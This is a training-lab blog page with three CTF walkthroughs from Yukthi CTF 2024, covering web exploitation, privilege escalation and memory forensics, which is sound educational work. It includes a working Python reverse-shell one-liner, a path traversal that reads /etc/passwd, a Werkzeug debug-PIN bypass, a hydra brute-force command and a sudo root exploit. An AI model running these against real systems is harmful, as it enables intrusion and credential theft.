May 21, 2024

Operation Warehouse

Operation Warehouse: Yukthi CTF 2024 Prelims – Cyber Investigation Challenge

Leave a Comment / CTF Challenges /

Introduction to Operation Warehouse Operation Warehouse is a fascinating web-based challenge featured in the Yukthi CTF 2024 prelims. This challenge immerses participants in a simulated underground network and offers an in-depth, step-by-step cyber puzzle. By testing your cybersecurity skills, this challenge supports your journey in mastering ethical hacking, all while gaining hands-on experience in Selfmade Ninja Lab cloud lab training for aspiring IT students. Journey Through the Challenge Starting with the basics, participants first exploit a Flask debug console vulnerability combined with a path traversal bug. These initial vulnerabilities provide a pathway to deeper insights, leading to crucial access points within the system. Successfully obtaining the Werkzeug debugger pin allows participants to launch a reverse shell via Python, marking a major milestone in the challenge. Delving Deeper The second phase of Operation Warehouse introduces a separate machine where participants unlock root access using Python’s setcap capabilities. This stage tests advanced real-world cyber-attack simulations, requiring skills in privilege escalation and effective navigation of complex system layers. Getting Started: Accessing the Labs Visit the Selfmade Ninja Labs and log in to your account (Click here) Don’t have an account? No worries! Create one here. Activate WireGuard Follow the provided setup instructions to activate the WireGuard VPN. Access the Machine Labs Dashboard Go to Selfmade Ninja Labs and click Machine Labs to open the dashboard. On the left sidebar, navigate to My Lab dropdown and select Challenge Lab. Find and Launch the Challenge Browse the challenge page for Send the Alien Back Home and click the challenge button. In the top-right corner, click Deploy Lab and then click Start Mission. Note the IP address assigned to your challenge. Use this IP address to configure port forwarding in your VS Code setup. Skills Learned By participating in Operation Warehouse, you develop essential cybersecurity skills including: Reconnaissance and exploitation strategies Privilege escalation and system security bypass Network reconnaissance and web pentesting Enumeration 1. Initial Reconnaissance Start by conducting a port scan using nmap to identify active ports. The scan reveals that port 7777 is open, suggesting that a web service might be running on that port. nmap -p- ipaddress This scan shows that port 7777 is actively accepting connections, which is typically indicative of a web service. 2. Exploring Port 7777 Port forwarding to port 7777 revealed a website running on the server. Analyzing the webpage's source code uncovers an interesting endpoint: readfile?file=about.html. Altering this endpoint to readfile?file=….//…// exposes a Flask error message, confirming the server's framework. Alternatively, you can use Wappalyzer to quickly detect the technologies used on the website, confirming that Flask is running on the server. Accessing the /console endpoint reveals the debug console pin on the production server. The presence of this debug feature results from the application being configured with DEBUG=True in its production settings. This configuration should be disabled in a live environment to prevent security vulnerabilities. 3. Exploiting Path Traversal Next, scrutinize the readfile endpoint, which serves files directly. Notably, the URL <a href="http://127.0.0.1:7777/readfile?file=app.py&#x60">http://127.0.0.1:7777/readfile?file=app.py&#x60</a>; indicates a susceptibility to a path traversal attack. The application's handling of path traversal is peculiar: initially, any "../" sequences are replaced with an empty string, and then subsequent "../"` sequences are converted to a dot. Using this knowledge, craft the following URL to exploit the vulnerability and attempt to read system files like /etc/passwd: http://127.0.0.1:7777/readfile?file=….//…//…//…//…//…//…//…//etc/passwd To effectively exploit the vulnerabilities of the Flask debugger, specific detailed information about the application environment is needed. Here’s a breakdown of the data required and how it can be used to retrieve the console pin using a script designed for bypassing the Werkzeug debug console. Required Data for Console Pin Exploitation To exploit the console pin, you need specific details about the Flask application environment, which are crucial for the script to generate the correct console pin. The necessary details include: Username: The username under which the Flask application is running. Modname: The name of the main module of the Flask application. Machine ID: A unique identifier for the host machine which can sometimes be extracted from files like /etc/machine-id. MAC Address: The MAC address of the network interface, often obtainable via system files or network configuration commands. Obtaining the Required Details These details can typically be found by examining files within the application environment or by exploiting other vulnerabilities, such as the path traversal flaw discovered. By gathering this information, you can effectively use the script to bypass the debug console's security. Using the Bypass Script For additional information and the script, check out the GitHub repository. https://github.com/wdahlenburg/werkzeug-debug-console-bypass Using this script correctly with the appropriate data will allow you to bypass the Werkzeug debug console's security and gain access. This can be crucial in a penetration testing scenario or a CTF challenge. OR 4. Obtaining Console Pin using automation script Further exploitation of the path traversal vulnerability allows for obtaining the console pin. A script automates fetching the necessary data such as Flask app module names and machine identifiers: https://git.selfmade.ninja/Jawahar.s/werkpin/-/blob/master/werkpindebug.py This script, when executed, provides the debug console pin 5. Exploiting the Debug Console With the debug pin in hand, you can now target a reverse shell. Set up a listener using nc: nc -lnvp 9001 Executing the following Python script then allowed a reverse shell connection to be established: import os;os.popen(“””python3 -c ‘import socket,subprocess,os,tty,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“172.30.0.73”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/bash”)'”””) The reverse shell provided direct command line access to the server. 6. Victory Using the obtained shell access, navigation to /home/jamie was accomplished to retrieve the first flag. Second Challenge: Escalating Privileges 1. Identifying Python Capability To escalate privileges, start by identifying if any system binaries have special capabilities that can be exploited. Use the getcap command to list all capabilities granted to executables. Command: getcap -r / 2> /dev/null This command recursively searches the root directory for all files with any set capabilities. It redirects errors to null to clean up the output. Finding: The command shows that Python 3.8 has been granted special capabilities, making it a potential vector for privilege escalation. 2.Escalating Privileges Using Python Once …

Operation Warehouse: Yukthi CTF 2024 Prelims – Cyber Investigation Challenge Read More »

Case unlocked

Case Unlocked: Yukthi CTF 2024 Prelims

Leave a Comment / CTF Challenges /

Introduction Welcome to Case Unlocked, a featured challenge in the Yukthi CTF 2024 prelims, designed to immerse participants in an engaging journey of digital exploration and security testing. This challenge reflects the innovative training offered by Selfmade Ninja Lab cloud lab training for aspiring IT students, where participants delve into uncovering vulnerabilities, gathering sensitive information, and mastering web exploitation techniques. By participating in this challenge, students develop essential cybersecurity skills, including identifying and exploiting web vulnerabilities, analyzing hidden credentials, and escalating privileges on Linux systems. It’s a hands-on approach that builds practical expertise in ethical hacking and web security. Getting Started To begin the challenge: Visit Selfmade Ninja Labs and sign in with your account. If you don’t have an account, create one using this link: Selfmade Ninja GitLab Sign In (click here) Activate WireGuard as prompted. Go back to Selfmade Ninja Labs and click on the Machine Labs section in your dashboard. In the left-side navigation bar, expand the My Labs dropdown and select Challenge Labs. Browse through the available challenges and search for Case Unlocked. Once you locate the challenge, click the Challenge button. At the top-right corner, select Deploy the Lab and then click Start Mission. You will receive an IP address for the deployed lab environment. Use VS Code to port forward this IP address and begin the challenge. Skills Learned Effective methods for exploring and exploiting web endpoints Techniques for uncovering hidden or obscured login credentials Strategies for privilege escalation on Linux systems Enumeration 1. Initial Reconnaissance The first step involved scanning the network for open ports. Using the command nmap -p- 10.11.3.92, we performed a comprehensive scan. nmap -p- 10.11.3.92 This preliminary scan is essential because it helps to identify potential entry points on the target machine. Specifically, it reveals which ports are listening and may be vulnerable to further exploitation. Thus, this scan provides crucial information for planning subsequent steps in the exploitation process. 2. Discovering Port 80 The scan results showed that port 80 was open, which indicated that a web service was running. By accessing this web service through a browser, you obtained a pivotal clue for further actions. Consequently, this clue guided the next steps in your exploration and exploitation process. Upon accessing the webpage, I encountered an interactive game embedded within the site. This discovery provided an intriguing element to explore further. Therefore, it became a focal point for deeper investigation and analysis. 3. Endpoint Exploration Utilizing the Nikto tool, a comprehensive web server scanner that checks for dangerous files, outdated server software, and other problems, I was able to discover some interesting endpoints: nikto -h http://localhost:34829 These included admin login and .git pages. Navigating to the admin page redirected to a login page, but without known credentials: The discovery of a publicly accessible .git directory was crucial. It is a common security oversight to leave git directories accessible on production servers, which can expose sensitive information. Using GitTools (https://github.com/internetwache/GitTools), I cloned the repository found on the server, allowing access to the development history and potentially sensitive data. 4. Unearthing Credentials https://github.com/internetwache/GitTools cd GitTools After cloning the git repository, the command git log | grep "commit" | cut -d " " -f2 | xargs git show was used to extract and decode commits. This command sequence is useful for examining commit histories to find potentially leaked sensitive information. git log | grep "commit" | cut -d " " -f2 | xargs git show The credentials were found encoded in Base64 within the commit messages: mail=tetris@gmail.com: passwd=VDdpM19pM181ZXJlY3RfN2E1NXcwcmQ=, which decodes to T7i3_i3_5erect_7a55w0rd. username= testris@gmail.com password=T7i3_i3_5erect_7a55w0rd 5. Securing the Flag With the decoded credentials in hand, I used them to log in through the login.html page. Upon successful authentication, It was redirected to the /secret.php page, where the first flag was revealed. Challenge 2: Loophole Discovery After completing the initial challenge, I resumed with another round of port scanning to uncover further points of attack. This scan highlighted an active SSH service on the target. 1. Further Reconnaissance A subsequent port scan revealed that SSH (port 22) was open, providing an ideal vector for utilizing the credentials discovered earlier. This allowed for direct access to the system’s shell. ssh tetris@IPaddress 2. Identifying Vulnerable Sudo Version Once inside the shell, I employed various strategies to escalate privileges. Noticing the sudo version was 1.8.21, an older and known exploitable version, I identified a potential avenue for attack. The presence of password feedback (asterisks when typing the password) confirmed that pwfeedback was enabled, a feature vulnerable to specific exploits. sudo –version Sudo Version Check: Research on Google led me to an exploit in the Exploit Database that could leverage this vulnerability (CVE-2019-18634). Exploit Repository: CVE-2019-18634 3. Gaining Root Access I cloned the exploit script from GitHub: git clone https://github.com/Plazmaz/CVE-2019-18634/ cd CVE-2019-18634 /self-contained.sh Running the ./self-contained.sh script from the cloned repository exploited the pwfeedback buffer overflow vulnerability, successfully granting root access. This allowed me to locate a critical document inside /root/locker/. Conclusion The Case Unlocked challenge is a testament to the comprehensive and practical learning approach offered by Selfmade Ninja Lab cloud lab training for aspiring IT students. By engaging with real-world scenarios, participants not only enhance their technical skills but also build the confidence to tackle complex cybersecurity challenges in the field. Let the mission begin—empower your skills with Selfmade Ninja Labs!

Mystery 013

Mastering the Mystery 013 – Yukthi CTF 2024 Prelims: A Cyber Forensics Journey

Leave a Comment / CTF Challenges, studentblogs /

Introduction to Mystery 013 "Mystery 013" is an engaging digital forensics challenge introduced in the Yukthi CTF 2024 prelims, designed for aspiring IT students interested in cyber investigation and decryption. This challenge offers a hands-on experience with key digital forensics skills essential for professionals in the field. Getting Started with Mystery 013 Before diving into the challenge, follow these steps to set up your environment using Selfmade Ninja Lab’s cloud lab training for aspiring students: Create an Account Visit Selfmade Ninja Labs to sign in (click here) If you don’t have an account, register at Selfmade Ninja Git (click here) Activate WireGuard Activate WireGuard to establish a secure connection. Access Machine Labs Navigate to Selfmade Ninja Labs and click Machine Labs to open the dashboard. Locate the Challenge On the left navbar, click the My Lab dropdown, then select Challenge Lab. Browse the list of challenges, search for Mystery 013, and click the Challenge button. Start the Mission On the challenge page, click the Deploy Lab button at the top right, then hit Start Mission. Note down the IP address provided. Configure the required port forwarding to begin your adventure! The Challenge Begins he adventure starts with a seemingly simple image. However, buried within its pixels are secrets waiting to be uncovered. Participants must first use steganography techniques to reveal the concealed data hidden within the image—an essential skill in digital image forensics training. Brute Force and Code Cracking After uncovering the hidden data, participants are tasked with applying brute force techniques to crack encryption codes, a critical skill for breaking down security layers. This stage enhances the ability to access crucial information, a valuable asset in cloud lab training for aspiring IT students in environments like the Selfmade Ninja Lab. RAM Analysis and Beyond The final phase is where participants dive into RAM analysis, examining memory dumps to extract significant information—emulating real-world cyber investigation. This step teaches effective techniques in memory analysis, helping participants build confidence in handling real cyber forensics cases. Key Skills Developed Digital image forensics Effective decryption techniques Analyzing memory dumps for evidence Enumeration Initial Reconnaissance We start our challenge by identifying open ports on the target IP using the nmap command. This crucial step helps us find potential entry points on the server. nmap -p- IPaddress Exploring Port 84 Upon discovering that port 84 is open, we navigate to it only to find a web interface. This web interface presented another puzzle in the form of an image which we decided to download for further analysis. Steganographic Extraction Using Steghide, a tool for embedding and extracting data hidden within images or audio files, we extracted contents from the image: sudo apt install steghide steghide extract -sf hid.jpeg cat secret.txt echo “LOVtcGxPeWUxMg==” | base64 -d This revealed a file named secret.txt, which contained an encrypted key in Base64. Decoding this key unveiled an endpoint, /EmplOye12. Navigating to this endpoint displayed detailed information about employees without requiring login credentials. Brute Force Attack Using the names found on the employees’ details page, we crafted a wordlist with cewl, a tool that generates custom wordlists by spidering a target’s website and collecting unique words cewl http://ipaddress:port/EmplOye12 >> wordlist.txt This list was then used to conduct a brute force attack with hydra, a popular network logon cracker, which successfully cracked the login credentials for the username "Chris". hydra -L wordlist.txT -P wordlist.txt IPaddress http-post-form " /logic/v1/login:user=^USER^&password=^PASS^:login failed" Using these credentials, we accessed the login page and successfully breached it, unveiling the first flag. username: Chris password: hacking Image Insight: The Second Challenge After successfully accessing the page with the necessary credentials, we found ourselves needing to answer questions about Case 013. The answers were believed to be hidden in a RAM image extracted from the suspect’s computer. RAM Analysis Introduction to Volatility Volatility is an open-source memory forensics framework for incident response and malware analysis. It helps investigators analyze volatile memory (RAM) to extract artifacts that provide insight into the runtime state of the system. Installing Volatility To use Volatility, you typically need Python on your system. You can install Volatility by cloning its repository from GitHub and then installing it through Python’s pip tool: git clone https://github.com/volatilityfoundation/volatility.git cd volatility pip install . Using the Volatility tool, we began dissecting the RAM image to uncover the required information. We started with the imageinfo command to identify the system architecture: volatility -f testing.vmem imageinfo This command confirmed the architecture as WinXPSP2x86. Upon entering the architecture data on the browser and verifying it, we received confirmation that our answer was correct. Detailed Analysis Using Volatility Plugins We proceeded to use various Volatility plugins to answer the remaining questions on the case tab: OS & Architecture: Confirmed as WinXPSP2x86 through the imageinfo plugin. Process IDs: Identified VMwareService.exe (PID: 1444) and winlogon.exe (PID: 632) using the pslist plugin. Shutdown Date: The last shutdown date was pinpointed as 2011-10-10 with the shutdowntime plugin. Remote Connection: Uncovered a connection to 172.16.98.1:6666 via the connscan plugin. Executed Commands: Found the last executed command sc query malware using the consoles plugin. Internet Explorer History: Detected an open HTML file license.html during the memory capture with the iehistory plugin. Using the extracted data, we addressed all the questions posed on the case page, leveraging the insights gained to piece together the motives behind the criminal’s actions and uncover the secrets hidden within the mysterious file. This comprehensive analysis ultimately led us to secure the second flag. Conclusion “Mystery 013” is a comprehensive digital forensics challenge, immersing aspiring IT students in a journey through steganography, code cracking, and memory forensics. It is an excellent training ground for those interested in cyber security and investigation roles, supported by Selfmade Ninja Lab’s cloud lab training for aspiring IT students. This challenge is not only a practical exercise but a valuable learning experience for participants looking to develop forensic and cyber investigation skills in a high-stakes environment.

logo-text (1)
Elevating Education Through Innovative Technology Solutions – Empowering Tomorrow's Leaders with SNA Education Tech.
Facebook-f Youtube Twitter Instagram Linkedin Gitlab Telegram

Categories

Get In Touch
SNA Ninja copy
logo-text (1)
Elevating Education Through Innovative Technology Solutions – Empowering Tomorrow's Leaders with SNA Education Tech.
SNA Ninja copy
Categories
Get In Touch
Facebook-f Youtube Twitter Instagram Linkedin Gitlab Telegram

© All Rights Reserved.

Scroll to Top